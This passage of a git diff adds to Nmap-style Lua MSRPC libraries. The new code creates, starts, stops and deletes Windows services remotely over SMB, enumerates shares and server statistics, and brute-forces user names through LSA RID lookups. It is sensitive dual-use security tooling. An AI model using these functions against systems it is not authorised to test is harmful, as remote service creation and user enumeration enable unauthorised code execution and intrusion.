+		status, lookupsids2_result = lsa_lookupsids2(smbstate, openpolicy2_result['policy_handle'], sids)
 		if(status == false) then
 			stdnse.print_debug(1, string.format("Error looking up RIDs: %s", lookupsids2_result))
 		else
@@ -2385,7 +2953,7 @@ function lsa_enum_users(host)
 					result['rid']	  = 500 + j - 1
 					result['domain']  = domain
 					result['type']    = lookupsids2_result['names']['names'][j]['sid_type']
-					result['typestr'] = msrpc.lsa_SidType_tostr(result['type'])
+					result['typestr'] = lsa_SidType_tostr(result['type'])
 					result['source']  = "LSA Bruteforce"
 					table.insert(response, result)
 				end
@@ -2406,24 +2974,34 @@ function lsa_enum_users(host)
 			end
 
 			-- Try converting this group of RIDs into names
-			status, lookupsids2_result = msrpc.lsa_lookupsids2(smbstate, openpolicy2_result['policy_handle'], sids)
+			status, lookupsids2_result = lsa_lookupsids2(smbstate, openpolicy2_result['policy_handle'], sids)
 			if(status == false) then
 				stdnse.print_debug(1, string.format("Error looking up RIDs: %s", lookupsids2_result))
 			else
 				-- Put the details for each name into an array
 				for j = 1, #lookupsids2_result['names']['names'], 1 do
-					if(lookupsids2_result['names']['names'][j]['sid_type'] ~= "SID_NAME_UNKNOWN") then
-						local result = {}
-						result['name']    = lookupsids2_result['names']['names'][j]['name']
-						result['rid']	  = start + j - 1
-						result['domain']  = domain
-						result['type']    = lookupsids2_result['names']['names'][j]['sid_type']
-						result['typestr'] = msrpc.lsa_SidType_tostr(result['type'])
-						result['source']  = "LSA Bruteforce"
-						table.insert(response, result)
+					-- Determine the RID
+					local name = lookupsids2_result['names']['names'][j]['name']
+					local rid = start + j - 1
+					local typenum = lookupsids2_result['names']['names'][j]['sid_type']
+					local typestr = lsa_SidType_tostr(typenum)
 
-						-- Increment the number of names we've found
-						used_names = used_names + 1
+					-- Check if the username matches the rid (one server we discovered returned every user as valid, 
+					-- this is to prevent that infinite loop)
+					if(tonumber(name) ~= rid) then
+						if(lookupsids2_result['names']['names'][j]['sid_type'] ~= "SID_NAME_UNKNOWN") then
+							local result = {}
+							result['name']    = name
+							result['rid']	  = rid
+							result['domain']  = domain
+							result['type']    = typenum
+							result['typestr'] = typestr
+							result['source']  = "LSA Bruteforce"
+							table.insert(response, result)
+	
+							-- Increment the number of names we've found
+							used_names = used_names + 1
+						end
 					end
 				end
 			end
@@ -2442,9 +3020,9 @@ function lsa_enum_users(host)
 	end
 
 	-- Close the handle
-	msrpc.lsa_close(smbstate, openpolicy2_result['policy_handle'])
+	lsa_close(smbstate, openpolicy2_result['policy_handle'])
 
-	msrpc.stop_smb(smbstate)
+	stop_smb(smbstate)
 
 	stdnse.print_debug(3, "Leaving enum_lsa()")
 
@@ -2499,3 +3077,453 @@ function get_user_list(host)
 	return true, response, names
 end
 
+---Create a "service" on a remote machine. This service is linked to an executable that is already
+-- on the system. The name of the service can be whatever you want it to be. The service is created
+-- in the "stopped" state with "manual" startup, and it ignores errors. The 'servicename' is what
+-- people will see on the system while the service is running, and what'll stay there is something
+-- happens that the service can't be deleted properly. 
+--
+-- Note that this (and the other "service" functions) are highly invasive. They make configuration
+-- changes to the machine that can potentially affect stability. 
+--
+-- The reason that this and the other "service" functions don't require a <code>smbstate</code> 
+-- object is that I wanted them to be independent. If a service fails to start, I don't want it 
+-- to affect the program's ability to stop and delete the service. Every service function is
+-- independent. 
+--
+--@param host        The host object. 
+--@param servicename The name of the service to create. 
+--@param path        The path and filename on the remote system. 
+--@return (status, err) If status is <code>false</code>, <code>err</code> is an error message; 
+--        otherwise, err is undefined. 
+function service_create(host, servicename, path)
+	local status, smbstate, bind_result, open_result, create_result, close_result
+
+	stdnse.print_debug(1, "Creating service: %s (%s)", servicename, path)
+
+	-- Create the SMB session
+	status, smbstate = start_smb(host, SVCCTL_PATH)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	-- Bind to SVCCTL service
+	status, bind_result = bind(smbstate, SVCCTL_UUID, SVCCTL_VERSION, nil)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, bind_result
+	end
+
+	-- Open the service manager
+	stdnse.print_debug(2, "Opening the remote service manager")
+	status, open_result = svcctl_openscmanagerw(smbstate, host.ip)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, open_result
+	end
+
+	-- Create the service
+	stdnse.print_debug(2, "Creating the service", servicename)
+	status, create_result = svcctl_createservicew(smbstate, open_result['handle'], servicename, servicename, path)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, create_result
+	end
+	-- Close the handle to the service
+	status, close_result = svcctl_closeservicehandle(smbstate, create_result['handle'])
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, close_result
+	end
+
+	-- Close the service manager
+	status, close_result = svcctl_closeservicehandle(smbstate, open_result['handle'])
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, close_result
+	end
+
+	smb.stop(smbstate)
+
+	return true
+end
+
+---Start a service on the remote machine based on its name. For example, to start the registry 
+-- service, this can be called on "RemoteRegistry". 
+--
+-- If you start a service on a machine, you should also stop it when you're finished. Every service
+-- running is extra attack surface for a potential attacker
+--
+--@param host        The host object. 
+--@param servicename The name of the service to start. 
+--@param args        [optional] The arguments to pass to the service. Most built-in services don't
+--                   require arguments. 
+--@return (status, err) If status is <code>false</code>, <code>err</code> is an error message; 
+--        otherwise, err is undefined. 
+function service_start(host, servicename, args)
+	local status, smbstate, bind_result, open_result, open_service_result, start_result, close_result, query_result
+
+	stdnse.print_debug(1, "Starting service: %s", servicename)
+
+	-- Create the SMB session
+	status, smbstate = start_smb(host, SVCCTL_PATH)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	-- Bind to SVCCTL service
+	status, bind_result = bind(smbstate, SVCCTL_UUID, SVCCTL_VERSION, nil)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, bind_result
+	end
+
+	-- Open the service manager
+	stdnse.print_debug(1, "Opening the remote service manager")
+	status, open_result = svcctl_openscmanagerw(smbstate, host.ip)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, open_result
+	end
+
+	-- Get a handle to the service
+	stdnse.print_debug(2, "Getting a handle to the service")
+	status, open_service_result = svcctl_openservicew(smbstate, open_result['handle'], servicename)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, open_service_result
+	end
+
+	-- Start it
+	stdnse.print_debug(2, "Starting the service")
+	status, start_result = svcctl_startservicew(smbstate, open_service_result['handle'], args)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, start_result
+	end
+
+	-- Wait for it to start
+	stdnse.print_debug(2, "Waiting for the service to start")
+	repeat
+		status, query_result = svcctl_queryservicestatus(smbstate, open_service_result['handle'])
+		if(status == false) then
+			smb.stop(smbstate)
+			return false, query_result
+		end
+	until query_result['service_status']['controls_accepted'][1] == "SERVICE_CONTROL_STOP"
+
+	-- Close the handle to the service
+	status, close_result = svcctl_closeservicehandle(smbstate, open_service_result['handle'])
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, close_result
+	end
+
+	-- Close the service manager
+	status, close_result = svcctl_closeservicehandle(smbstate, open_result['handle'])
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, close_result
+	end
+
+	smb.stop(smbstate)
+
+	return true
+end
+
+---Stop a service on the remote machine based on its name. For example, to stop the registry 
+-- service, this can be called on "RemoteRegistry". 
+--
+-- This can be called on a service that's already stopped without hurting anything (just keep in mind
+-- that an error will be returned). 
+-- 
+--@param host        The host object. 
+--@param servicename The name of the service to stop. 
+--@return (status, err) If status is <code>false</code>, <code>err</code> is an error message; 
+--        otherwise, err is undefined. 
+function service_stop(host, servicename)
+	local status, smbstate, bind_result, open_result, open_service_result, control_result, close_result, query_result
+
+	stdnse.print_debug(1, "Stopping service: %s", servicename)
+
+	-- Create the SMB session
+	status, smbstate = start_smb(host, SVCCTL_PATH)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	-- Bind to SVCCTL service
+	status, bind_result = bind(smbstate, SVCCTL_UUID, SVCCTL_VERSION, nil)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, bind_result
+	end
+
+	-- Open the service manager
+	stdnse.print_debug(2, "Opening the remote service manager")
+	status, open_result = svcctl_openscmanagerw(smbstate, host.ip)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, open_result
+	end
+
+	-- Get a handle to the service
+	stdnse.print_debug(2, "Getting a handle to the service")
+	status, open_service_result = svcctl_openservicew(smbstate, open_result['handle'], servicename)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, open_service_result
+	end
+
+	-- Stop it
+	stdnse.print_debug(2, "Stopping the service")
+	status, control_result = svcctl_controlservice(smbstate, open_service_result['handle'], "SERVICE_CONTROL_STOP")
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, control_result
+	end
+
+	-- Wait for it to stop (TODO: Make this better)
+	stdnse.print_debug(2, "Waiting for the service to stop")
+	repeat
+		status, query_result = svcctl_queryservicestatus(smbstate, open_service_result['handle'])
+		if(status == false) then
+			smb.stop(smbstate)
+			return false, query_result
+		end
+	until query_result['service_status']['controls_accepted'][1] == nil
+
+	-- Close the handle to the service
+	status, close_result = svcctl_closeservicehandle(smbstate, open_service_result['handle'])
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, close_result
+	end
+
+	-- Close the service manager
+	status, close_result = svcctl_closeservicehandle(smbstate, open_result['handle'])
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, close_result
+	end
+
+	smb.stop(smbstate)
+
+	return true
+end 
+
+---Delete a service on the remote machine based on its name. I don't recommend deleting any services that
+-- you didn't create. 
+-- 
+--@param host        The host object. 
+--@param servicename The name of the service to delete. 
+--@return (status, err) If status is <code>false</code>, <code>err</code> is an error message; 
+--        otherwise, err is undefined. 
+function service_delete(host, servicename)
+	local status, smbstate, bind_result, open_result, open_service_result, delete_result, close_result
+
+	stdnse.print_debug(1, "Deleting service: %s", servicename)
+
+	-- Create the SMB session
+	status, smbstate = start_smb(host, SVCCTL_PATH)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	-- Bind to SVCCTL service
+	status, bind_result = bind(smbstate, SVCCTL_UUID, SVCCTL_VERSION, nil)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, bind_result
+	end
+
+	-- Open the service manager
+	stdnse.print_debug(2, "Opening the remote service manager")
+	status, open_result = svcctl_openscmanagerw(smbstate, host.ip)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, open_result
+	end
+
+	-- Get a handle to the service
+	stdnse.print_debug(2, "Getting a handle to the service: %s", servicename)
+	status, open_service_result = svcctl_openservicew(smbstate, open_result['handle'], servicename)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, open_service_result
+	end
+
+	-- Delete the service
+	stdnse.print_debug(2, "Deleting the service")
+	status, delete_result = svcctl_deleteservice(smbstate, open_service_result['handle'])
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, delete_result
+	end
+
+	-- Close the handle to the service
+	status, close_result = svcctl_closeservicehandle(smbstate, open_service_result['handle'])
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, close_result
+	end
+
+	-- Close the service manager
+	status, close_result = svcctl_closeservicehandle(smbstate, open_result['handle'])
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, close_result
+	end
+
+	smb.stop(smbstate)
+
+	return true
+end
+
+---Retrieves statistical information about the given server. This function requires administrator privileges
+-- to run, and is present on all Windows versions, so it's a useful way to check whether or not an account
+-- is administrative. 
+--@param host       The host object
+--@return (status, data) If status is false, data is an error message; otherwise, data is a table of information
+--        about the server. 
+function get_server_stats(host)
+	local stats
+
+	-- Create the SMB session
+	status, smbstate = start_smb(host, SRVSVC_PATH)
+	if(status == false) then
+		return false, smbstate
+	end
+   
+	-- Bind to SRVSVC service
+	status, bind_result = bind(smbstate, SRVSVC_UUID, SRVSVC_VERSION, nil)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, bind_result
+	end
+   
+	-- Call netservergetstatistics for 'server'
+	status, netservergetstatistics_result = srvsvc_netservergetstatistics(smbstate, host.ip)
+	if(status == false) then
+		smb.stop(smbstate)
+		return false, netservergetstatistics_result
+	end
+   
+	-- Stop the session
+	smb.stop(smbstate)
+   
+	-- Build the response   
+	local stats = netservergetstatistics_result['stat']
+
+	-- Convert the date to a string
+	stats['start_str'] = os.date("%Y-%m-%d %H:%M:%S", stats['start'])
+
+	-- Get the period and convert it to a proper time offset
+	stats['period'] = os.time() - stats['start']
+	if(stats['period'] > 60 * 60 * 24) then
+		stats['period_str'] = string.format("%dd%dh%02dm%02ds", stats['period'] / (60*60*24), (stats['period'] % (60*60*24)) / 3600, (stats['period'] % 3600) / 60, stats['period'] % 60)
+	elseif(stats['period'] > 60 * 60) then
+		stats['period_str'] = string.format("%dh%02dm%02ds", stats['period'] / 3600, (stats['period'] % 3600) / 60, stats['period'] % 60)
+	else
+		stats['period_str'] = string.format("%02dm%02ds", stats['period'] / 60, stats['period'] % 60)
+	end
+   
+	-- Combine the 64-bit values
+	stats['bytessent'] = bit.bor(bit.lshift(stats['bytessent_high'], 32), stats['bytessent_low'])
+	stats['bytesrcvd'] = bit.bor(bit.lshift(stats['bytesrcvd_high'], 32), stats['bytesrcvd_low'])
+
+	-- Sidestep divide-by-zero errors (probabyl won't come up, but I'd rather be safe)
+	if(stats['period'] == 0) then
+		stats['period'] = 1
+	end
+   
+  	-- Get the bytes/second values
+	stats['bytessentpersecond'] = stats['bytessent'] / stats['period']
+	stats['bytesrcvdpersecond'] = stats['bytesrcvd'] / stats['period']
+
+	return true, stats
+end
+
+---Attempts to enumerate the shares on a remote system using MSRPC calls. Without a user account,
+-- this will likely fail against a modern system, but will succeed against Windows 2000. 
+--
+--@param host The host object. 
+--@return Status (true or false).
+--@return List of shares (if status is true) or an an error string (if status is false).
+function enum_shares(host)
+
+	local status, smbstate
+	local bind_result, netshareenumall_result
+	local shares
+	local i, v
+
+	-- Create the SMB session
+	status, smbstate = start_smb(host, SRVSVC_PATH)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	-- Bind to SRVSVC service
+	status, bind_result = bind(smbstate, SRVSVC_UUID, SRVSVC_VERSION, nil)
+	if(status == false) then
+		smb.stop(smbstate) 
+		return false, bind_result
+	end
+
+	-- Call netsharenumall
+	status, netshareenumall_result = srvsvc_netshareenumall(smbstate, host.ip)
+	if(status == false) then
+		smb.stop(smbstate) 
+		return false, netshareenumall_result
+	end
+
+	-- Stop the SMB session
+	smb.stop(smbstate)
+
+	-- Convert the share list to an array
+	shares = {}
+	for i, v in pairs(netshareenumall_result['ctr']['array']) do
+		shares[#shares + 1] = v['name']
+	end
+
+	return true, shares
+end
+
+
+---Attempts to retrieve additional information about a share. Will fail unless we have 
+-- administrative access. 
+--
+--@param host The host object. 
+--@return Status (true or false).
+--@return A table of information about the share (if status is true) or an an error string (if 
+--        status is false).
+function get_share_info(host, name)
+	local status, smbstate
+	local response = {}
+
+	-- Create the SMB session
+	status, smbstate = start_smb(host, SRVSVC_PATH)
+	if(status == false) then
+		return false, smbstate
+	end
+
+	-- Bind to SRVSVC service
+	status, bind_result = bind(smbstate, SRVSVC_UUID, SRVSVC_VERSION, nil)
+	if(status == false) then
+		smb.stop(smbstate) 
+		return false, bind_result
+	end
+
+	-- Call NetShareGetInfo
+	status, netsharegetinfo_result = srvsvc_netsharegetinfo(smbstate, host.ip, name, 2)
+	if(status == false) then
+		smb.stop(smbstate) 
+		return false, netsharegetinfo_result
+	end
+
+	smb.stop(smbstate)
+
+	return true, netsharegetinfo_result
+end
+
+
diff --git a/nselib/msrpcperformance.lua b/nselib/msrpcperformance.lua
index 95bb95a05..37c8b1823 100644
--- a/nselib/msrpcperformance.lua
+++ b/nselib/msrpcperformance.lua
@@ -27,11 +27,21 @@ require 'msrpctypes'
 --                              message), and a table representing the datatype, if any.
 local function parse_perf_title_database(data, pos)
 	local result = {}
+	local i = 1
 
 	repeat
 		local number, name
 		pos, number, name = bin.unpack("<zz", data, pos)
+
+		if(number == nil) then
+			return false, "Couldn't parse the title database: end of string encountered early"
+		elseif(tonumber(number) == nil) then -- Not sure if this actually happens, but it doesn't hurt to check
+			stdnse.print_debug(1, "MSRPC: ERROR: Couldn't parse the title database: string found where number expected (%d: '%s')", i, number)
+			return false, "Couldn't parse the title database"
+		end
+
 		result[tonumber(number)] = name
+		i = i + 1
 	until pos >= #data
 
 	return true, pos, result
@@ -451,12 +461,12 @@ function get_performance_data(host, objects)
 	-- Parse the title database
 	pos = 1
 	status, pos, result['title_database'] = parse_perf_title_database(queryvalue_result['value'], pos)
-	result['title_database'][0] = "<null>"
-
 	if(status == false) then
 		msrpc.stop_smb(smbstate)
 		return false, pos
 	end
+	result['title_database'][0] = "<null>"
+
 
 	if(objects ~= nil and #objects > 0) then
 		-- Query for the objects
diff --git a/nselib/msrpctypes.lua b/nselib/msrpctypes.lua
index f5a4b4e7f..d29990a3b 100644
--- a/nselib/msrpctypes.lua
+++ b/nselib/msrpctypes.lua
@@ -124,7 +124,7 @@ function string_to_unicode(string, do_null)
 	local i
 	local result = ""
 
-	stdnse.print_debug(4, string.format("MSRPC: Entering string_to_unicode(string = %s)", string))
+	stdnse.print_debug(4, "MSRPC: Entering string_to_unicode(string = %s)", string)
 
 	if(do_null == nil) then
 		do_null = false
@@ -559,9 +559,40 @@ function marshall_unicode(str, do_null, max_length)
 	return result
 end
 
+--- Marshall a null-teriminated ascii string, with the length/maxlength prepended. Very similar
+-- to <code>marshall_unicode</code>, except it's ascii and the null terminator is always used. 
+--
+--@param str        The string to marshall. 
+--@param max_length [optional] The maximum length; default: actual length. 
+function marshall_ascii(str, max_length)
+	local buffer_length
+	local result
+	local padding = ""
+
+	buffer_length = string.len(str) + 1
+
+	if(max_length == nil) then
+		max_length = buffer_length
+	end
+
+	while((string.len(str .. string.char(0) .. padding) % 4) ~= 0) do
+		padding = padding .. string.char(0)
+	end
+
+	result = bin.pack("<IIIzA", 
+				max_length,
+				0,
+				buffer_length,
+				str,
+				padding
+			)
+
+	return result
+end
+
 --- Marshall a pointer to a unicode string. 
 --
---@param str The string to insert. Cannot be nil. 
+--@param str The string to insert. Can be nil. 
 --@param do_null [optional] Appends a null to the end of the string. Default false. 
 --@param max_length [optional] Sets a max length that's different than the string's length. Length
 --                  is in characters, not bytes. 
@@ -578,6 +609,19 @@ function marshall_unicode_ptr(str, do_null, max_length)
 	return result
 end
 
+--- Marshall a pointer to an ascii string. 
+--
+--@param str The string to insert. Can be nil. 
+--@param max_length [optional] Sets a max length that's different than the string's length. 
+--@return A string representing the marshalled data. 
+function marshall_ascii_ptr(str, max_length)
+	local result
+
+	result = marshall_ptr(ALL, marshall_ascii, {str, max_length}, str)
+
+	return result
+end
+
 --- Unmarshall a string that is in the format:
 -- <code>[string,charset(UTF16)] uint16 *str</code>
 --
@@ -626,6 +670,41 @@ function unmarshall_unicode_ptr(data, pos, do_null)
 	return pos, result
 end
 
+---Marshall an array of unicode strings. This is a perfect demonstration of how to use 
+-- <code>marshall_array</code>. 
+--
+--@param strings The array of strings to marshall
+--@param do_null [optional] Appends a null to the end of the string. Default false. 
+--@return A string representing the marshalled data. 
+function marshall_unicode_array(strings, do_null)
+	local array = {}
+	local result
+
+	for i = 1, #strings, 1 do
+		array[i] = {}
+		array[i]['func'] = marshall_ptr
+		array[i]['args'] = {marshall_unicode, {strings[i], do_null}, strings[i]}
+	end
+
+	result = marshall_array(array)
+
+	return result
+end
+
+---Marshall a pointer to an array of unicode strings. See <code>marshall_unicode_array</code>
+-- for more information. 
+--
+--@param strings The array of strings to marshall
+--@param do_null [optional] Appends a null to the end of the string. Default false. 
+--@return A string representing the marshalled data. 
+function marshall_unicode_array_ptr(strings, do_null)
+	local result
+
+	result = marshall_ptr(ALL, marshall_unicode_array, {strings, do_null}, strings)
+
+	return result
+end
+
 --- Marshall an int64. This is simply an 8-byte integer inserted into the buffer, nothing fancy. 
 --@param int64 The integer to insert
 --@return A string representing the marshalled data. 
@@ -1197,6 +1276,34 @@ local function unmarshall_Enum16(data, pos, table, default, pad)
 	return pos, default
 end
 
+---Marshall an entry in a table. Basically, converts the string to a number based on the entries in
+-- <code>table</code> before sending. Multiple values can be ORed together (like flags) by separating
+-- them with pipes ("|"). 
+--
+--@param val The value to look up. Can be multiple values with pipes between, eg, "A|B|C". 
+--@param table The table to use for lookups. The keys should be the names, and the values should be 
+--             the numbers. 
+--@param pad [optional] If set, will ensure that we end up on an even multiple of 4. Default: true. 
+--@return A string representing the marshalled data. 
+local function marshall_Enum8(val, table, pad)
+	local result = 0
+	stdnse.print_debug(4, string.format("MSRPC: Entering marshall_Enum8()"))
+
+	local vals = stdnse.strsplit("|", val)
+	local i
+
+	for i = 1, #vals, 1 do
+		result = bit.bor(result, table[vals[i]])
+	end
+	
+	result = marshall_int8(result, pad)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving marshall_Enum8()"))
+	return result
+end
+
+
+
 ---Similar to <code>unmarshall_Enum32</code>, except it'll return every value that could be ANDed together to
 -- create the resulting value (except a 0 value). This is effective for parsing flag data types.
 --@param data    The data packet. 
@@ -2470,13 +2577,19 @@ function marshall_winreg_StringBuf(table, max_length)
 		end
 	end
 
-	if(name == nil) then
+	-- For some reason, 0-length strings are handled differently (no null terminator)...
+	if(name == "") then
 		length = 0
+		result = bin.pack("<SSA", length * 2, max_length * 2, marshall_ptr(ALL, marshall_unicode, {name, false, max_length}, name))
 	else
-		length = string.len(name) + 1
-	end
+		if(name == nil) then
+			length = 0
+		else
+			length = string.len(name) + 1
+		end
 
-	result = bin.pack("<SSA", length * 2, max_length * 2, marshall_ptr(ALL, marshall_unicode, {name, true, max_length}, name))
+		result = bin.pack("<SSA", length * 2, max_length * 2, marshall_ptr(ALL, marshall_unicode, {name, true, max_length}, name))
+	end
 
 	stdnse.print_debug(4, string.format("MSRPC: Leaving marshall_winreg_StringBuf()"))
 	return result
@@ -4019,8 +4132,363 @@ function unmarshall_samr_DomainInfo_ptr(data, pos)
 end
 
 
+----------------------------------
+--       SVCCTL
+-- (dependencies: MISC)
+----------------------------------
+
+local svcctl_ControlCode = 
+{
+	SERVICE_CONTROL_CONTINUE       = 0x00000003,
+	SERVICE_CONTROL_INTERROGATE    = 0x00000004,
+	SERVICE_CONTROL_NETBINDADD     = 0x00000007,
+	SERVICE_CONTROL_NETBINDDISABLE = 0x0000000A,
+	SERVICE_CONTROL_NETBINDENABLE  = 0x00000009,
+	SERVICE_CONTROL_NETBINDREMOVE  = 0x00000008,
+	SERVICE_CONTROL_PARAMCHANGE    = 0x00000006,
+	SERVICE_CONTROL_PAUSE          = 0x00000002,
+	SERVICE_CONTROL_STOP           = 0x00000001,
+}
+local svcctl_ControlCode_str = 
+{
+	SERVICE_CONTROL_CONTINUE       = "Notifies a paused service that it should resume.",
+	SERVICE_CONTROL_INTERROGATE    = "Notifies a service that it should report its current status information to the service control manager.",
+	SERVICE_CONTROL_NETBINDADD     = "Notifies a network service that there is a new component for binding. Deprecated.",
+	SERVICE_CONTROL_NETBINDDISABLE = "Notifies a network service that one of its bindings has been disabled. Deprecated.",
+	SERVICE_CONTROL_NETBINDENABLE  = "Notifies a network service that a disabled binding has been enabled. Deprecated",
+	SERVICE_CONTROL_NETBINDREMOVE  = "Notifies a network service that a component for binding has been removed. Deprecated",
+	SERVICE_CONTROL_PARAMCHANGE    = "Notifies a service that its startup parameters have changed.",
+	SERVICE_CONTROL_PAUSE          = "Notifies a service that it should pause.",
+	SERVICE_CONTROL_STOP           = "Notifies a service that it should stop."
+}
+
+
+---Marshall a <code>svcctl_ControlCode</code>. This datatype is tied to the table above with that 
+-- name. 
+--
+--@param flags The value to marshall, as a string
+--@return The marshalled integer representing the given value, or <code>nil</code> if it wasn't 
+--        found. 
+function marshall_svcctl_ControlCode(flags)
+	local result
+	stdnse.print_debug(4, string.format("MSRPC: Entering marshall_svcctl_ControlCode()"))
+
+	result = marshall_Enum32(flags, svcctl_ControlCode)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving marshall_svcctl_ControlCode()"))
+	return result
+end
+
+---Unmarshall a <code>svcctl_ControlCode</code>. This datatype is tied to the table with that name. 
+--
+--@param data The data packet. 
+--@param pos  The position within the data. 
+--@return (pos, str) The new position, and the string representing the datatype. 
+function unmarshall_svcctl_ControlCode(data, pos)
+	local str
+	stdnse.print_debug(4, string.format("MSRPC: Entering unmarshall_svcctl_ControlCode()"))
+
+	pos, str = unmarshall_Enum32_array(data, pos, svcctl_ControlCode)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving unmarshall_svcctl_ControlCode()"))
+	return pos, str
+end
+
+---Convert a <code>svcctl_ControlCode</code> value to a string that can be shown to the user. This is
+-- based on the <code>_str</table> table. 
+--
+--@param val The string value (returned by the <code>unmarshall_</code> function) to convert.
+--@return A string suitable for displaying to the user, or <code>nil</code> if it wasn't found. 
+function svcctl_ControlCode_tostr(val)
+	local result
+	stdnse.print_debug(4, string.format("MSRPC: Entering svcctl_ControlCode_tostr()"))
+
+	result = svcctl_ControlCode_str[val]
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving svcctl_ControlCode_tostr()"))
+	return result
+end
+
+local svcctl_Type =
+{
+    SERVICE_TYPE_KERNEL_DRIVER       = 0x01,
+    SERVICE_TYPE_FS_DRIVER           = 0x02,
+    SERVICE_TYPE_ADAPTER             = 0x04,
+    SERVICE_TYPE_RECOGNIZER_DRIVER   = 0x08,
+    SERVICE_TYPE_DRIVER              = 0x0B,
+    SERVICE_TYPE_WIN32_OWN_PROCESS   = 0x10,
+    SERVICE_TYPE_WIN32_SHARE_PROCESS = 0x20,
+    SERVICE_TYPE_WIN32               = 0x30
+}
+
+---Marshall a <code>svcctl_Type</code>. This datatype is tied to the table above with that 
+-- name. 
+--
+--@param flags The value to marshall, as a string
+--@return The marshalled integer representing the given value, or <code>nil</code> if it wasn't 
+--        found. 
+function marshall_svcctl_Type(flags)
+	local result
+	stdnse.print_debug(4, string.format("MSRPC: Entering marshall_svcctl_Type()"))
+
+	result = marshall_Enum32(flags, svcctl_Type)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving marshall_svcctl_Type()"))
+	return result
+end
+
+---Unmarshall a <code>svcctl_Type</code>. This datatype is tied to the table with that name. 
+--
+--@param data The data packet. 
+--@param pos  The position within the data. 
+--@return (pos, str) The new position, and the string representing the datatype. 
+function unmarshall_svcctl_Type(data, pos)
+	local str
+	stdnse.print_debug(4, string.format("MSRPC: Entering unmarshall_svcctl_Type()"))
+
+	pos, str = unmarshall_Enum32_array(data, pos, svcctl_Type)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving unmarshall_svcctl_Type()"))
+	return pos, str
+end
+
+---Convert a <code>svcctl_Type</code> value to a string that can be shown to the user. This is
+-- based on the <code>_str</table> table. 
+--
+--@param val The string value (returned by the <code>unmarshall_</code> function) to convert.
+--@return A string suitable for displaying to the user, or <code>nil</code> if it wasn't found. 
+function svcctl_Type_tostr(val)
+	local result
+	stdnse.print_debug(4, string.format("MSRPC: Entering svcctl_Type_tostr()"))
+
+	result = svcctl_Type_str[val]
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving svcctl_Type_tostr()"))
+	return result
+end
 
 
 
+local svcctl_State =
+{
+    SERVICE_STATE_ACTIVE   = 0x01,
+    SERVICE_STATE_INACTIVE = 0x02,
+    SERVICE_STATE_ALL      = 0x03
+}
+---Marshall a <code>svcctl_State</code>. This datatype is tied to the table above with that 
+-- name. 
+--
+--@param flags The value to marshall, as a string
+--@return The marshalled integer representing the given value, or <code>nil</code> if it wasn't 
+--        found. 
+function marshall_svcctl_State(flags)
+	local result
+	stdnse.print_debug(4, string.format("MSRPC: Entering marshall_svcctl_State()"))
+
+	result = marshall_Enum32(flags, svcctl_State)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving marshall_svcctl_State()"))
+	return result
+end
+
+---Unmarshall a <code>svcctl_State</code>. This datatype is tied to the table with that name. 
+--
+--@param data The data packet. 
+--@param pos  The position within the data. 
+--@return (pos, str) The new position, and the string representing the datatype. 
+function unmarshall_svcctl_State(data, pos)
+	local str
+	stdnse.print_debug(4, string.format("MSRPC: Entering unmarshall_svcctl_State()"))
+
+	pos, str = unmarshall_Enum32_array(data, pos, svcctl_State)
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving unmarshall_svcctl_State()"))
+	return pos, str
+end
+
+---Convert a <code>svcctl_State</code> value to a string that can be shown to the user. This is
+-- based on the <code>_str</table> table. 
+--
+--@param val The string value (returned by the <code>unmarshall_</code> function) to convert.
+--@return A string suitable for displaying to the user, or <code>nil</code> if it wasn't found. 
+function svcctl_State_tostr(val)
+	local result
+	stdnse.print_debug(4, string.format("MSRPC: Entering svcctl_State_tostr()"))
+
+	result = svcctl_State_str[val]
+
+	stdnse.print_debug(4, string.format("MSRPC: Leaving svcctl_State_tostr()"))
+	return result
+end
+
+
+---Unmarshall a SERVICE_STATUS struct, converting it to a table. The structure is as
+-- follows:
+--
+-- <code>
+--    typedef struct {
+--        uint32 type;
+--        uint32 state;
+--        uint32 controls_accepted;
+--        WERROR win32_exit_code;
+--        uint32 service_exit_code;
+--        uint32 check_point;
+--        uint32 wait_hint;
+--    } SERVICE_STATUS;
+-- </code>
+--
+--@param data The data packet. 
+--@param pos  The position within the data. 
+--@return (pos, table) The new position, and the table of values. 
+function unmarshall_SERVICE_STATUS(data, pos)
+	local result = {}
+
+	pos, result['type']              = unmarshall_svcctl_Type(data, pos)
+	pos, result['state']             = unmarshall_svcctl_State(data, pos)
+	pos, result['controls_accepted'] = unmarshall_svcctl_ControlCode(data, pos)
+	pos, result['win32_exit_code']   = unmarshall_int32(data, pos)
+	pos, result['service_exit_code'] = unmarshall_int32(data, pos)
